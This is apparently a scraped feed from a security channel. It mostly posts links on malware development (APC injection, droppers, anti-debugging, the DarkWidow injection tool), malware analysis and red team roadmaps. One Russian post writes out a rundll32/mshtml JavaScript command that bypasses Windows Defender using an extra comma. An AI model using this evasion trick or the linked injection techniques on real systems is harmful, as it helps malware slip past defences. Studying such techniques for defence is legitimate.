Source Byte

From CreateProcess() to NtCreateUserProcess() Link #malware_dev ——— @islemolecule_source

Windows Defender Detection Mitigation Bypass Vulnerability Win LPE В 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. * то есть было и пофиксили: C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) магия запятой: C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) собака старая, трюки новые. CVE пока не имеет ) #defender #bypass

Reverse engineering of Android Phoenix RAT Analysis: link Phoenix overview: link #malware_analysis ——— @islemolecule_source

Analyzing Mutation Coded VM Protect Link #packer ——— @islemolecule_source

https://drive.google.com/drive/folders/0By8giYopjXKPYjJSTGFwZHR0RUU #books ——— @islemolecule_source

پیاده سازی APC Injection در C Link #malware_dev ——— @islemolecule_source

We are preparing for Valentine's day. We are now known as vx-uwu

UwU theme for x64dbg https://github.com/OALabs/uwudbg-theme

Coyote: A multi-stage banking Trojan abusing the Squirrel installer Link #malware_analysis ——— @islemolecule_source

How should I activate my Linux 🤔

Red team road map Intern / junior / medium / senior Red team needed concepts Credit : Sohiel Hashemi ( red teamer ) https://xmind.app/m/9Zcnkq #red_team , ——— @islemolecule_source

رودمپ پیشنهادی برای ورود به #ردتیم https://xmind.app/m/9Zcnkq

Rdtsc ant-debugger instruction Link #malware_dev #malware_analysis ——— @islemolecule_source

Windows Process Internals : A few Concepts to know before jumping on Memory Forensics credit : Kirtar Oza https://web.archive.org/web/20201117183039/https://eforensicsmag.com/windows-process-internals-a-few-concepts-to-know-before-jumping-on-memory-forensics-by-kirtar-oza/ #windows_internls . #memory_forensics ——— @islemolecule_source

#Offensive_security Indirect Dynamic Syscall, SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing + Api resolving from TIB + API hashing https://github.com/reveng007/DarkWidow

Learn to create Native Dropper Link #malware_dev ——— @islemolecule_source